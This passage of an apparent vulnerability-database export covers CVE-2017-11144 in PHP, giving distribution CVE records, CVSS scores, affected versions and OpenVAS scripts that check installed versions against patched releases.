"NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11144"], "modified": "2018-05-04T01:29:00", "cpe": ["cpe:/a:php:php:7.0.16", "cpe:/a:php:php:7.1.2", "cpe:/a:php:php:7.0.5", "cpe:/a:php:php:7.1.1", "cpe:/a:php:php:7.0.7", "cpe:/a:php:php:7.1.0", "cpe:/a:php:php:7.0.15", "cpe:/a:php:php:7.0.13", "cpe:/a:php:php:7.0.20", "cpe:/a:php:php:7.0.3", "cpe:/a:php:php:7.0.14", "cpe:/a:php:php:7.0.19", "cpe:/a:php:php:7.1.5", "cpe:/a:php:php:7.0.0", "cpe:/a:php:php:7.1.4", "cpe:/a:php:php:7.0.18", "cpe:/a:php:php:7.0.1", "cpe:/a:php:php:7.0.17", "cpe:/a:php:php:7.0.12", "cpe:/a:php:php:7.0.11", "cpe:/a:php:php:7.1.3", "cpe:/a:php:php:7.0.2", "cpe:/a:php:php:5.6.30", "cpe:/a:php:php:7.0.6", "cpe:/a:php:php:7.0.10", "cpe:/a:php:php:7.1.6", "cpe:/a:php:php:7.0.4", "cpe:/a:php:php:7.0.9", "cpe:/a:php:php:7.0.8"], "id": "CVE-2017-11144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11144", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.30:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.14:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2021-12-14T17:51:49", "description": "In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-10T14:29:00", "type": "debiancve", "title": "CVE-2017-11144", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11144"], "modified": "2017-07-10T14:29:00", "id": "DEBIANCVE:CVE-2017-11144", "href": "https://security-tracker.debian.org/tracker/CVE-2017-11144", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhatcve": [{"lastseen": "2021-09-02T22:49:43", "description": "In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-17T14:20:20", "type": "redhatcve", "title": "CVE-2017-11144", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11144"], "modified": "2020-08-18T13:19:27", "id": "RH:CVE-2017-11144", "href": "https://access.redhat.com/security/cve/cve-2017-11144", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2023-09-30T22:36:36", "description": "In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the\nopenssl extension PEM sealing code did not check the return value of the\nOpenSSL sealing function, which could lead to a crash of the PHP\ninterpreter, related to an interpretation conflict for a negative number in\next/openssl/openssl.c, and an OpenSSL documentation omission.\n\n#### Bugs\n\n * <https://bugs.php.net/bug.php?id=74651>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-07-10T00:00:00", "type": "ubuntucve", "title": "CVE-2017-11144", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11144"], "modified": "2017-07-10T00:00:00", "id": "UB:CVE-2017-11144", "href": "https://ubuntu.com/security/CVE-2017-11144", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:34:10", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "cvss3": {}, "published": "2017-07-11T00:00:00", "type": "openvas", "title": "PHP Multiple Vulnerabilities - Jul17 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11146", "CVE-2017-11628", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310811481", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811481", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_multiple_vuln_jul_win.nasl 11863 2018-10-12 09:42:02Z mmartin $\n#\n# PHP Multiple Vulnerabilities - Jul17 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811481\");\n script_version(\"$Revision: 11863 $\");\n script_cve_id(\"CVE-2017-11145\", \"CVE-2017-11144\", \"CVE-2017-11146\", \"CVE-2017-11628\",\n \"CVE-2017-7890\");\n script_bugtraq_id(99492, 99550, 99605, 99612, 99489);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:42:02 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-11 19:28:21 +0530 (Tue, 11 Jul 2017)\");\n script_name(\"PHP Multiple Vulnerabilities - Jul17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - An ext/date/lib/parse_date.c out-of-bounds read affecting the php_parse_date\n function.\n\n - The openssl extension PEM sealing code did not check the return value of the\n OpenSSL sealing function.\n\n - lack of bounds checks in the date extension's timelib_meridian parsing code.\n\n - A stack-based buffer overflow in the zend_ini_do_op() function in\n 'Zend/zend_ini_parser.c' script.\n\n - The GIF decoding function gdImageCreateFromGifCtx in gd_gif_in.c in the GD\n Graphics Library (aka libgd) does not zero colorMap arrays before use.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to leak information from the interpreter, crash PHP\n interpreter and also disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.31, 7.x before 7.0.21,\n and 7.1.x before 7.1.7\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.31, 7.0.21, 7.1.7,\n or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE))){\n exit(0);\n}\n\nif(! vers = get_app_version(cpe:CPE, port:port)){\n exit(0);\n}\n\nif(version_is_less(version:vers, test_version:\"5.6.31\")){\n fix = \"5.6.31\";\n}\n\nif(version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.20\")){\n fix = \"7.0.21\";\n}\n\nif(vers =~ \"^7\\.1\" && version_is_less(version:vers, test_version:\"7.1.7\")){\n fix = \"7.1.7\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:11:00", "description": "Several issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and can\nbe embedded into HTML.\n\nCVE-2016-10397\nIncorrect handling of various URI components in the URL parser could\nbe used by attackers to bypass hostname-specific URL checks.\n\nCVE-2017-11143\nAn invalid free in the WDDX deserialization of boolean parameters\ncould be used by attackers able to inject XML for deserialization to\ncrash the PHP interpreter.\n\nCVE-2017-11144\nThe openssl extension PEM sealing code did not check the return value\nof the OpenSSL sealing function, which could lead to a crash of the\nPHP interpreter.\n\nCVE-2017-11145\nLack of a bounds check in the date extension", "cvss3": {}, "published": "2018-02-08T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for php5 (DLA-1034-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11147", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891034", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891034", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891034\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-10397\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11147\");\n script_name(\"Debian LTS: Security Advisory for php5 (DLA-1034-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-08 00:00:00 +0100 (Thu, 08 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/07/msg00026.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"php5 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n5.4.45-0+deb7u9.\n\nWe recommend that you upgrade your php5 packages.\");\n\n script_tag(name:\"summary\", value:\"Several issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and can\nbe embedded into HTML.\n\nCVE-2016-10397\nIncorrect handling of various URI components in the URL parser could\nbe used by attackers to bypass hostname-specific URL checks.\n\nCVE-2017-11143\nAn invalid free in the WDDX deserialization of boolean parameters\ncould be used by attackers able to inject XML for deserialization to\ncrash the PHP interpreter.\n\nCVE-2017-11144\nThe openssl extension PEM sealing code did not check the return value\nof the OpenSSL sealing function, which could lead to a crash of the\nPHP interpreter.\n\nCVE-2017-11145\nLack of a bounds check in the date extension's timelib_meridian\nparsing code could be used by attackers able to supply date strings to\nleak information from the interpreter.\n\nCVE-2017-11147\nThe PHAR archive handler could be used by attackers supplying\nmalicious archive files to crash the PHP interpreter or potentially\ndisclose information due to a buffer over-read in the\nphar_parse_pharfile function in ext/phar/phar.c.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:36", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "cvss3": {}, "published": "2017-07-11T00:00:00", "type": "openvas", "title": "PHP Multiple Vulnerabilities - Jul17 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11146", "CVE-2017-11628", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2018-10-15T00:00:00", "id": "OPENVAS:1361412562310811482", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811482", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_multiple_vuln_jul_lin.nasl 11900 2018-10-15 07:44:31Z mmartin $\n#\n# PHP Multiple Vulnerabilities - Jul17 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811482\");\n script_version(\"$Revision: 11900 $\");\n script_cve_id(\"CVE-2017-11145\", \"CVE-2017-11144\", \"CVE-2017-11146\", \"CVE-2017-11628\",\n \"CVE-2017-7890\");\n script_bugtraq_id(99492, 99550, 99605, 99612, 99489);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-15 09:44:31 +0200 (Mon, 15 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-11 19:29:21 +0530 (Tue, 11 Jul 2017)\");\n script_name(\"PHP Multiple Vulnerabilities - Jul17 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - An ext/date/lib/parse_date.c out-of-bounds read affecting the php_parse_date\n function.\n\n - The openssl extension PEM sealing code did not check the return value of the\n OpenSSL sealing function.\n\n - lack of bounds checks in the date extension's timelib_meridian parsing code.\n\n - A stack-based buffer overflow in the zend_ini_do_op() function in\n 'Zend/zend_ini_parser.c' script.\n\n - The GIF decoding function gdImageCreateFromGifCtx in gd_gif_in.c in the GD\n Graphics Library (aka libgd) does not zero colorMap arrays before use.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to leak information from the interpreter, crash PHP\n interpreter and also disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.31, 7.x before 7.0.21,\n and 7.1.x before 7.1.7\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.31, 7.0.21, 7.1.7,\n or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(phpport = get_app_port(cpe:CPE))){\n exit(0);\n}\n\nif(! vers = get_app_version(cpe:CPE, port:phpport)){\n exit(0);\n}\n\nif(version_is_less(version:vers, test_version:\"5.6.31\")){\n fix = \"5.6.31\";\n}\n\nif(version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.20\")){\n fix = \"7.0.21\";\n}\n\nif(vers =~ \"^7\\.1\" && version_is_less(version:vers, test_version:\"7.1.7\")){\n fix = \"7.1.7\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:phpport, data:report);\n exit(0);\n}\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:25", "description": "Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11142\nDenial of service via overly long form variables\n\nCVE-2017-11143\nInvalid free() in wddx_deserialize()\n\nCVE-2017-11144\nDenial of service in openssl extension due to incorrect return value\ncheck of OpenSSL sealing function.\n\nCVE-2017-11145\nOut-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\nBuffer overflow in PHP INI parsing API\n\nCVE-2017-12933\nBuffer overread in finish_nested_data()\n\nCVE-2017-16642\nOut-of-bounds read in timelib_meridian()", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4081-1 (php5 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12933", "CVE-2017-11143", "CVE-2017-11628", "CVE-2017-16642", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704081", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4081-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n 